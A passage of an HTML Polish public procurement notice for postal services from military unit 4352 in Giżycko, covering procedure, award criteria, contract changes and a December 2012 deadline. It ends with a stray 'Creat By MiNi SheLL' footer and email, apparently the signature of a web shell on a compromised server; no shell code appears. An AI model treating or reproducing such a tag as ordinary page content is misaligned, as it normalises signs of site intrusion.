2. ZESTAWIENIE CENOWE PRZEDMIOTU ZAMÓWIENIA - wypełniony                         i podpisany wg wzoru Zamawiającego (Załącznik nr 5 do SIWZ ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy, z którym zawrze umowę w wyniku niniejszego postępowania  w przypadku zmiany stawki podatku od towarów i usług w 2013r. w formie aneksu.
b)Zmiany cen za poszczególne przesyłki i paczki można dokonać wyłączni w przypadku akceptacji przez Urząd Komunikacji Elektronicznej nowych taryfikatorów opłat pocztowych.
c)Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego, w przypadku, gdy łączne wynagrodzenie za zrealizowanie przedmiotu zamówienia, będzie niższe od wynagrodzenia maksymalnego określonego w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl,http://www.army.mil.pl,http://www.24wog.wp.mil.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO
budynek sztabowy pok. 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 08:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
Adres: ul. Nowowiejska 20, 11-500 GIŻYCKO
budynek sztabowy pok. 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com